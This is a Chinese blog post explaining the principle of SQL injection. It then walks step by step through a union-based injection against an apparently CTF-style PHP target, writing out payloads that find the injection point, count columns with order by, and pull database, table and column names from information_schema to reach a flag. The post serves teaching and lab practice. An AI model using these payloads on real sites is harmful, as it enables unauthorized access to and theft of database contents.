SQL注入的原理分析

最新推荐文章于 2024-05-29 14:49:40 发布
最新推荐文章于 2024-05-29 14:49:40 发布
阅读量1k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790675/article/details/108759832
版权

SQL注入的原理分析

一、注入攻击的本质

1.注入攻击的本质,是把用户输入的数据当作代码执行。

$uname = $_REQUEST['uname'];

$sql = "select*from admin where uname = '$uname'";

select*from admin where uname = 'a';

恶意传参:select*from admin where uname = 'a' and 1 = 1#'

('用一个单引号将前方语句闭合)(and 1 = 1被当作代码执行) (#注释掉后面的代码)

2.SQL注入点就是可以进行SQL注入的地方。

二、什么是SQL注入?

1.SQL注入就是针对SQL语句的注入,也可以理解为用户输入的数据当作SQL语句的代码执行了。(SQL注入是1998年一名叫作rfp的黑客发表的一篇文章所进入大众视线的,SQL注入在OWASP TOP10位于榜首)

2.SQL注入有两个关键条件

(1)用户能控制输入

(2)原本程序要执行的代码,拼接了用户输入的数据然后进行执行

3.打开一个网站,在url栏中改变参数(将id=1改为id=2)发现页面出现变化,说明与数据库产生了交互,有SQL漏洞。

三、显错联合查询流程

1.判断是否有SQL注入点

(1)打开一个网站,在url栏中改变参数,发现页面变化,说明与数据库产生了交互,存在SQL漏洞

(2)判断注入点的方法

  • 将id=1改为id=2或id=1 and1>10
  • 页面后加上一个英文字符的‘看是否报错
  • 注释的方法判定:_ _空qwe
  • 数字传参的方法:id=2-1(如果存在SQL漏洞,会运算出结果;反之不会)

2.判断表内有几个字段(order by 1)

在url栏中order by 4是回显报错,所以存在三个字段

3.判断回显点

先让id=1报错,改为id=1.1(id=1.1 union select 1,2,3)由步骤2可知有三个字段

可知回显点在2和3

4.跑库名(select database())

id=1.1 union select 1,database(),3    (用第二个回显点来进行SQL注入)

5.找到表名 (select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1)

  •   table_name为4中查到的error
  • 利用limit 0,1查库中有多少个表名(limit 0,1代表从第一行数据开始取第一个)

所以该库中存在两个表名,即user 和error_flag

6.查找字段( select 1,column_name,3 from information_schema.columns where table_name='admin' limit 0,1)

  • admin为表名
  • 因为该库中存在两个表,所以要分别查询表中的字段

user表中有三个字段,分别为:(1)id  (2)password  (3)username

同理error_flag表中有两个字段为:(1)id  (2)flag

7.查数据

(select 1,字段,3 from 表 limit 0,1)

  • 分别查询两个表里面的字段

查询结果分别为

8.成功找到flag!

也可以用sqlmap跑数据

 

 

 

 

 

Monkey:
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
sql注入原理分析
qq_39416206的博客
03-16 2625
sql注入原理
SQL注入介绍与原理分析
03-28
下面将详细阐述SQL注入原理、常见类型及其防范措施。 一、SQL注入原理 SQL注入的基础在于应用程序没有充分验证或转义用户提供的输入。当用户提交的数据被直接拼接到SQL查询中时,恶意输入就可能改变查询的原始...
SQL注入原理分析
最新发布
2401_84466359的博客
05-29 1203
order by的作用及含义order by 用于判断显示位,order by 原有的作用是对字段进行一个排序,在sql注入中用order by 来判断排序,order by 1就是对一个字段进行排序,如果一共四个字段,你order by 5 数据库不知道怎么排序,就错误了无返回值。union select如何发挥作用union为联合查询,a联合b进行了查询,为查询了前面的sql语句(原有的)后再进行后面的sq查询(我们添加的),但两张表联合查询的字段数必须相同。输出位是什么。
sql注入原理分析
Mic_x_的博客
09-24 532
mybatis-plus SQL注入原理分析
大佬味的小男孩的博客https://www.yuque.com/dalaoweidexiaonanhai
03-17 363
前言 掌握 spring mybatis 知识,再来看本文。 我这里有一个EmployeeMapper接口,根据id进行删除,打上断点,一起来探索吧! 从断点里面可以看到 com.baomidou.mybatisplus.core.override.MybatisMapperProxy@650c405c 是Employeeapper接口的代理对象。 我们用idea双击shift 键盘进行搜索:MybatisMapperProxy 映入眼帘的第一句话是: 从 {@link MapperProxy}
SQL注入语义分析库libinjection
西京刀客
03-24 1025
libinjection是一款用于防御SQL注入攻击的开源软件库。它是由C语言编写的,可以嵌入到任何Web应用程序中,并可以较为准确地检测和防止恶意SQL注入语句。libinjection采用了基于正则表达式的技术来识别和拦截SQL注入攻击,同时其开放源代码的特点也使得其具备了较高的可定制性和扩展性。
SQL注入漏洞代码分析
m0_74025111的博客
04-23 915
按照所传递的数据类型分类: 数字型注入 SELECT first_name, last_name FROM users WHERE user_id= id字符型注入SELECTfirstn​ame,lastn​ameFROMusersWHEREuseri​d=′id‘ 无论何种类型,都可以通过直接输入单引号来判断是否存在注入点。对于字符型注入,对用于接收用户参数的变量,用mysql_real_escape_string()、addslashes()等函数进行过滤。代码层面 1.对输入进行严格的转义和过滤;
SQL注入原理及DVWA实战
qq_43535990的博客
11-01 699
SQL注入原理及DVWA实战一、SQL注入原理二、测试实例三、DVWA实战 一、SQL注入原理 要理解SQL注入原理,就必须了解能够对数据库中的信息进行增删改查的SQL语言。Sql 注入攻击就是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。当然,根据数据库版本类型的不同,相应的注入语句也有所不同,这需要我们去了解学习。 二、测试实例 需要用到的知识:PHP语言,Apache Web服务器,MySQL数据
SQL注入-01】SQL语句基础及SQL注入漏洞原理及分类
m0_64378913的博客
04-23 5670
目录1 SQL注入概述1.1 SQL注入简介1.2 SQL注入原理(掌握)1.3 SQL注入漏洞的危害(掌握)2 SQL注入漏洞分类2.1 注入位置分类(掌握)2.2 注入数据类型分类(掌握)2.3 注入手法分类(掌握)3 SQL语句基础3.1 简介3.2 注释3.3 MySQL 元数据库 information_schema 内容简介3.4 MySQL 常用函数4 总结参考文献 1 SQL注入概述 1.1 SQL注入简介 定义:SQL注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传
SQL注入分析
weixin_46356409的博客
10-07 1514
网络安全之SQL注入
SQL注入漏洞原理分析
06-21
### SQL注入漏洞原理分析 #### 一、SQL注入概述 SQL注入(SQL Injection)是一种常见的安全漏洞,攻击者可以通过在应用程序接收的输入中插入恶意SQL语句,来操控数据库执行非预期的操作。随着B/S模式应用系统的...
pangolinsdl—sql注入工具
06-20
通过理解PangolinsDL的原理和使用方法,安全专业人员能够更有效地评估和防护SQL注入风险,提升系统的安全性。同时,对于开发人员来说,使用这样的工具也是提高代码质量、避免常见安全漏洞的重要途径。
使用PDO防sql注入原理分析
12-16
本文使用pdo的预处理方式可以避免sql注入。下面话不多说了,来一起看看详细的介绍吧 在php手册中’PDO–预处理语句与存储过程’下的说明: 很多更成熟的数据库都支持预处理语句的概念。什么是预处理语句?可以把它...
SQL注入全过程深入分析
09-10
SQL注入是一种严重的网络安全威胁,它发生在应用程序没有正确过滤或验证用户输入,导致恶意构造的...通过理解SQL注入的工作原理和危害,以及采取适当的预防措施,我们可以大大降低这种攻击的风险,保护用户数据的安全。
PHP的SQL注入过程分析
10-28
了解SQL注入原理并采取有效的防御措施对于任何PHP开发者来说至关重要。通过参数化查询、输入验证和限制数据库权限,可以大大降低SQL注入的风险。同时,定期审计代码,及时修复已知漏洞,也是保护网站安全的重要步骤...
计算机病毒与防护:SQL注入原理.ppt
06-10
**计算机病毒与防护:SQL注入原理** SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的Web应用程序。这种攻击手段是由于应用程序在处理用户输入时没有进行充分的验证和过滤,使得攻击者可以...
sql注入网站源码
04-09
1. **SQL注入原理**:攻击者通过输入恶意构造的SQL代码,使得原本的查询语句发生变化,从而实现未授权的数据访问。例如,如果一个登录页面的查询语句是"SELECT * FROM Users WHERE username = '" + Request(...
sql注入 join原理
07-27
- *1* *2* [一篇文章彻底学懂SQL注入(包含基础数据库句法、SQL注入原理以及所有常见SQL注入类型以及绕过手法)](https://blog.csdn.net/Acong_L/article/details/124634092)[target="_blank" data-report-click={"spm...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值